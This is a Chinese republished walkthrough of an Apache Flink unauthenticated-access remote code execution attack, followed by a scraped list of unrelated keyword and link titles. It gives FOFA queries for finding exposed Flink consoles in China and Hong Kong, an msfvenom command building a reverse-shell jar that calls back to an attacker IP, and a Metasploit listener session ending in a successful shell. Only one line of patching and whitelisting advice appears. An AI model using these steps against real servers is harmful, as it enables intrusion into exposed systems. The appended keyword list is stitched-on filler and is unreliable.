Apache Flink未授权访问+远程代码执行的示例分析
发表于:2025-02-03 作者:千家信息网编辑
千家信息网最后更新 2025年02月03日,这篇文章给大家分享的是有关Apache Flink未授权访问+远程代码执行的示例分析的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。Apache Flink 未授权访问+远程
千家信息网最后更新 2025年02月03日Apache Flink未授权访问+远程代码执行的示例分析
这篇文章给大家分享的是有关Apache Flink未授权访问+远程代码执行的示例分析的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。
Apache Flink 未授权访问+远程代码执行
FOFA
FOFA 语句
app="Apache-Flink" && country="CN"
app="Apache-Flink" && country="CN" && region="HK"
国内还是很多使用 Apache Flink 的,大概有1K+的数量左右
漏洞复现
1、这里随便搞个站打开进行复现,打开以后就长这样子。
点击Submit New Job翻译:文件上传 2、打开MSF 生成一个 jar 木马
msfvenom -p java/meterpreter/reverse_tcp LHOST=**.***.59.61 LPORT=4444 -f jar > testone.jar
3、点击 Add 上传 jar 文件
4、设置监听端口
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload java/shell/reverse_tcp
payload => java/shell/reverse_tcp
msf5 exploit(multi/handler) > set lhost XX.XXX.XX.61
lhost => XX.XXX.XX.61
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run
5、点击下 submit
6、反弹shell成功
修复建议
建议用户关注Apache Flink官网,及时获取该漏洞最新补丁。临时解决建议 设置IP白名单只允许信任的IP访问控制台并添加访问认证。
感谢各位的阅读!关于"Apache Flink未授权访问+远程代码执行的示例分析"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!
代码
建议
示例
分析
内容
文件
更多
漏洞
篇文章
不错
实用
成功
名单
控制台
数量
文章
木马
样子
用户
看吧
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
云服务器行业热点聚焦
江北ios软件开发商
法律手段网络安全
数据库教程简笔画简单
计算机网络技术证书有什么用
传奇4哪个服务器是亚服
阿里云服务器能转让吗
上海小型软件开发价格大全
前端数据库开发面试题
网络安全法下的内容
绝地求生2服务器怎么选
2021网络安全大赛
下面哪些是流行的数据库技术
日本网络安全公司招聘
宝山区重型网络技术厂家供应
上海软件开发技能标兵2021
网络安全维护是做什么
收个网吧服务器可以自己开网吧吗
中电天津网络安全
国内航路数据库 P点
数据库中掩码的设置
网络安全为主图文并茂
服务器端开启服务和服务
网络安全法正式发布
土豆视频服务器走丢了怎么回事
安徽6端口网络安全硬件设备厂家
网络安全等级划分几组
服务器开机时间过长报错
我的世界基岩测试版服务器
软件开发项目的资金渠道有哪些
